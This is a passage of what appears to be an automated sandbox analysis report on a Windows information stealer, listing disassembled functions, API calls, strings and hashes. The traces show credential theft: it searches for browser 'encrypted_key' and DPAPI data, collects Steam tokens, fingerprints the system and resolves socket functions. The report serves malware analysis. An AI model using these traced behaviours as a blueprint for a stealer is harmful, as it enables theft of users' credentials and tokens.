                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 66b3d5a87c3bf4d94de6f4094c28bee22d78bb9f5435f7c32ac6460287541806
                                    • Instruction ID: a8afa5394677ed5157a6b383007477df4ab226b65526eb9b18d09dab74bcb734
                                    • Opcode Fuzzy Hash: 66b3d5a87c3bf4d94de6f4094c28bee22d78bb9f5435f7c32ac6460287541806
                                    • Instruction Fuzzy Hash: 9B515A71900606DBCB20DFA8E884A6BBBB9FF84310F18865AEC45DB355EF30E941CB55
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,0053D750,00000000,00020119,?,00000000,000000FE), ref: 008DD90C
                                    • RegQueryValueExA.ADVAPI32(?,0053E4D8,00000000,00000000,?,?), ref: 008DD933
                                    • RegCloseKey.ADVAPI32(?), ref: 008DD93E
                                    • lstrcat.KERNEL32(?,?), ref: 008DD964
                                    • lstrcat.KERNEL32(?,0053E4F0), ref: 008DD976
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID: 8S
                                    • API String ID: 690832082-3026468002
                                    • Opcode ID: 3a45fdd4f3ebf11000a0a5b1d52ccf497bc604e6765613429ff7b3cd8e922e41
                                    • Instruction ID: 7d561c4aae9b1a17ef882b47df27833cb9754d132a312d2b7b01d87bb7fbedc4
                                    • Opcode Fuzzy Hash: 3a45fdd4f3ebf11000a0a5b1d52ccf497bc604e6765613429ff7b3cd8e922e41
                                    • Instruction Fuzzy Hash: 09416F71214244AFD754EFA8D886FAA77B4FB84304F408429B98CC7292DF34E949CB93
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 008E28C5
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E28CC
                                    • RegOpenKeyExA.ADVAPI32(80000002,0052C470,00000000,00020119,008E2849), ref: 008E28EB
                                    • RegQueryValueExA.ADVAPI32(008E2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 008E2905
                                    • RegCloseKey.ADVAPI32(008E2849), ref: 008E290F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: e94cb93137da9eeff093c77f8a9cafd322e06a1334b4cfa84736929f3bf0b5ba
                                    • Instruction ID: 1d74c2aef894c86f4018ed68a997f89eaf8d82b91bcd4b0bf92926124f76791d
                                    • Opcode Fuzzy Hash: e94cb93137da9eeff093c77f8a9cafd322e06a1334b4cfa84736929f3bf0b5ba
                                    • Instruction Fuzzy Hash: FB01BC75600258AFE710DBE0AC59FBB7BBCEB49711F100098FE45D7241EA705A06C7A0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 008E2835
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E283C
                                      • Part of subcall function 008E28B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 008E28C5
                                      • Part of subcall function 008E28B0: RtlAllocateHeap.NTDLL(00000000), ref: 008E28CC
                                      • Part of subcall function 008E28B0: RegOpenKeyExA.ADVAPI32(80000002,0052C470,00000000,00020119,008E2849), ref: 008E28EB
                                      • Part of subcall function 008E28B0: RegQueryValueExA.ADVAPI32(008E2849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 008E2905
                                      • Part of subcall function 008E28B0: RegCloseKey.ADVAPI32(008E2849), ref: 008E290F
                                    • RegOpenKeyExA.ADVAPI32(80000002,0052C470,00000000,00020119,008D9560), ref: 008E2871
                                    • RegQueryValueExA.ADVAPI32(008D9560,0053E208,00000000,00000000,00000000,000000FF), ref: 008E288C
                                    • RegCloseKey.ADVAPI32(008D9560), ref: 008E2896
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: bd7fda9e79eacccd0bcdb60478f449bd6be025b7ae34d0b7d1eb12961cd6c360
                                    • Instruction ID: ab75e4113115dc5c2be79b9dcd76224cc589e1963a718f979492728cfe4faea3
                                    • Opcode Fuzzy Hash: bd7fda9e79eacccd0bcdb60478f449bd6be025b7ae34d0b7d1eb12961cd6c360
                                    • Instruction Fuzzy Hash: D301AD75A40218BFEB14EBE4AC49FBB7B7CEB44315F004168FE08D2290EA749946C7A0
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 008C717E
                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 008C71B9
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C71C0
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 008C7203
                                    • HeapFree.KERNEL32(00000000), ref: 008C720A
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 008C7269
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                    • String ID:
                                    • API String ID: 174687898-0
                                    • Opcode ID: 586109656389e44427ccfa26d83876a9ee4524756f3eb6de15dbe2121437b19c
                                    • Instruction ID: 85d3e19ecee9dfdd1255e7ef6780efc6cad7b21b22d57f81d7c67a276d70696f
                                    • Opcode Fuzzy Hash: 586109656389e44427ccfa26d83876a9ee4524756f3eb6de15dbe2121437b19c
                                    • Instruction Fuzzy Hash: E6412A717056059BEB20CFA9D884BAAB3F8FB88315F1845ADE95AC7340E631E941CB50
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 008C9D08
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008C9D3A
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008C9D63
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2746078483-738592651
                                    • Opcode ID: 2effe420c35e591b0d773d940c2938497945f36a05b635000529f3a6cf6394c1
                                    • Instruction ID: e5ced901c0932c60190176fef4f2b529f522aa01ddf5e5a2eb0aa8f85eda18c8
                                    • Opcode Fuzzy Hash: 2effe420c35e591b0d773d940c2938497945f36a05b635000529f3a6cf6394c1
                                    • Instruction Fuzzy Hash: C1416A71A006099BDB10EFA8C889FAE7BB4FF44301F0445ADEA95E7292DA30ED05C791
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DEB8B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DEBC0
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DEBCC
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DEBE3
                                    • lstrcat.KERNEL32(?,005390D8), ref: 008DEBF4
                                    • lstrcat.KERNEL32(?,008F1D5C), ref: 008DEC04
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: d52cbce33825c6fd652e9b37f8e9e3bbaefa12ed18b6f28fff26a73504dbbb9a
                                    • Instruction ID: 9e5d52e88f1b1231570edc76259635db120c995e843002196be4ed47e0185865
                                    • Opcode Fuzzy Hash: d52cbce33825c6fd652e9b37f8e9e3bbaefa12ed18b6f28fff26a73504dbbb9a
                                    • Instruction Fuzzy Hash: FF415071614204AFC754EBB8DC45FAA77B4FF88310F408929BA99C7391DE34E9198B92
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008DEE3F
                                    • lstrlen.KERNEL32(00000000), ref: 008DEE4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008DEE74
                                    • lstrlen.KERNEL32(00000000), ref: 008DEE7B
                                    • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 008DEEAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: steam_tokens.txt
                                    • API String ID: 367037083-401951677
                                    • Opcode ID: 1b399e02210e6da8910593328d797e3ec9f536b3602daec7c563e711acbc9a16
                                    • Instruction ID: 76f691c5b2f63eec4c37144a2e5e49b5a73f06e22d5388a5be34e6981a0b3ce7
                                    • Opcode Fuzzy Hash: 1b399e02210e6da8910593328d797e3ec9f536b3602daec7c563e711acbc9a16
                                    • Instruction Fuzzy Hash: 12313631A11A555BC721BBBCD88AF6E7BB5FF40300F440629B844DB2A2DE34DD1A87D2
                                    APIs
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,008C12EE), ref: 008C9AFA
                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,008C12EE), ref: 008C9B10
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,008C12EE), ref: 008C9B27
                                    • ReadFile.KERNEL32(00000000,00000000,?,008C12EE,00000000,?,?,?,008C12EE), ref: 008C9B40
                                    • LocalFree.KERNEL32(?,?,?,?,008C12EE), ref: 008C9B60
                                    • CloseHandle.KERNEL32(00000000,?,?,?,008C12EE), ref: 008C9B67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 8a6df1edbdecfd7aaa87789fa0b2593ee74ff5aeeb6d6428ba5e35ab2ed63e39
                                    • Instruction ID: 2cfec507c83998df416265eda3573a7e7b386228c15a296b64a5a0ca33803989
                                    • Opcode Fuzzy Hash: 8a6df1edbdecfd7aaa87789fa0b2593ee74ff5aeeb6d6428ba5e35ab2ed63e39
                                    • Instruction Fuzzy Hash: AB11D67160021AAFE714DFA5EC88FBA777CEB04714F1041A9F915D6280EA34ED51CB65
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008E5B34
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1B8
                                      • Part of subcall function 008EA1A3: std::exception::exception.LIBCMT ref: 008EA1DE
                                    • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 008E5B9C
                                    • memmove.MSVCRT(00000000,?,?), ref: 008E5BA9
                                    • memmove.MSVCRT(00000000,?,?), ref: 008E5BB8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long
                                    • API String ID: 2052693487-3788999226
                                    • Opcode ID: 720299a0c850d40b800e3095cce77e2a9ec7a7c8b5bea8cf681c5365e5fad407
                                    • Instruction ID: a8d82416eb51752b6547b2e6c38980cbf931ce36cffc538b8e2da9b5ee65c948
                                    • Opcode Fuzzy Hash: 720299a0c850d40b800e3095cce77e2a9ec7a7c8b5bea8cf681c5365e5fad407
                                    • Instruction Fuzzy Hash: 3D416E75A005199FCF08DF6DC991AAEBBB5FB89714F148229E919E7384E730DD008B91
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7DD8
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA205
                                      • Part of subcall function 008EA1F0: std::exception::exception.LIBCMT ref: 008EA22B
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7DF6
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                    • String ID: invalid string position$string too long
                                    • API String ID: 3310641104-4289949731
                                    • Opcode ID: 59e51ff4b02ab2c49639d7700783515a2c32fb064b25b7d229033df4de3d2221
                                    • Instruction ID: 2ae043ad3cd09c600aa9f668d4e00cf3439789b5e0dbc3a699be2b8661da17b1
                                    • Opcode Fuzzy Hash: 59e51ff4b02ab2c49639d7700783515a2c32fb064b25b7d229033df4de3d2221
                                    • Instruction Fuzzy Hash: BE2171323086448BD7249E6CD881A2AB7E5FF95B10F204B6FE596CB741E771EC4187A1
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008DED14
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008DED43
                                    • lstrcat.KERNEL32(?,00000000), ref: 008DED51
                                    • lstrcat.KERNEL32(?,0053E460), ref: 008DED6C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID: `S
                                    • API String ID: 818526691-3154622632
                                    • Opcode ID: 53fb109599de3e0165b30b043b564bff7f3f4e955ca147651b24a568df3c0acc
                                    • Instruction ID: e2ae2a02f729dbfdad167f62a2fc9e9b3cabc823e4a4e76e980e8ce83fdef44a
                                    • Opcode Fuzzy Hash: 53fb109599de3e0165b30b043b564bff7f3f4e955ca147651b24a568df3c0acc
                                    • Instruction Fuzzy Hash: 6F317C71A10118ABCB10EBB8DC45FEE77B8FB88300F0001A9BA45D7391DE70EE498B95
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E338F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E3396
                                    • GlobalMemoryStatusEx.KERNEL32 ref: 008E33B1
                                    • wsprintfA.USER32 ref: 008E33D7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB
                                    • API String ID: 2922868504-2651807785
                                    • Opcode ID: 27243ec2212a0939dbec5c90268051c674359b64004c1fb41df67a0f724b2831
                                    • Instruction ID: f1dff8db75096caaf26b0ad7c261e8dcf70fa1d40e085e0eb55688f206ac87da
                                    • Opcode Fuzzy Hash: 27243ec2212a0939dbec5c90268051c674359b64004c1fb41df67a0f724b2831
                                    • Instruction Fuzzy Hash: 6101B1B1A04658ABDB04DFE8DD49F7EB7B8FB45B10F000629F916E7380DB789D0186A5
                                    APIs
                                      • Part of subcall function 008E4800: LoadLibraryA.KERNEL32(ws2_32.dll,?,008D7741), ref: 008E4806
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,connect), ref: 008E481C
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 008E482D
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 008E483E
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,htons), ref: 008E484F
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 008E4860
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,recv), ref: 008E4871
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,socket), ref: 008E4882
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 008E4893
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,closesocket), ref: 008E48A4
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,send), ref: 008E48B5
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539038), ref: 008D7848
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D7880
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D78DD
                                      • Part of subcall function 008E7240: lstrcpy.KERNEL32(00000000), ref: 008E725A
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5C15
                                      • Part of subcall function 008D5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008D5C44
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C75
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C9D
